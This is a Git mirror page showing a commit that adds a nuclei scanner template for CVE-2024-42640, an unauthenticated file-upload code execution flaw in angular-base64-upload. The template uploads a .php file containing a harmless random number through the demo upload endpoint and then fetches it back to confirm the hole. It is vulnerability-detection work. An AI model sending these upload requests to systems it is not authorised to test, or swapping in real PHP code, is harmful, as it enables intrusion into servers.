daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #11000 from Kazgangap/CVE-2024-42640 

CVE-2024-42640
patch-16
Ritik Chaddha 2024-11-20 10:12:26 +05:30 committed by GitHub
parent ceac38b459 eb50795b58
commit d38ae927f3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 69 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

69
http/cves/2024/CVE-2024-42640.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2024-42640
info:
name: Angular-Base64-Upload - Remote Code Execution
author: s4e-io
severity: critical
description: |
angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
reference:
- https://github.com/rvizx/CVE-2024-42640
- https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
- https://github.com/adonespitogo/angular-base64-upload
- https://nvd.nist.gov/vuln/detail/CVE-2024-42640
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 10
cve-id: CVE-2024-42640
cwe-id: CWE-94
epss-score: 0.00043
epss-percentile: 0.09695
metadata:
max-request: 4
tags: cve,cve2024,angular,rce
variables:
filename: "{{to_lower(rand_text_alpha(12))}}"
num: "{{rand_int(1000000,9999999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
- |
POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
matchers:
- type: dsl
dsl:
- 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
- 'status_code_1 == 200 || status_code_2 == 200'
condition: and
internal: true
- raw:
- |
GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
- 'status_code_3 == 200 || status_code_4 == 200'
condition: and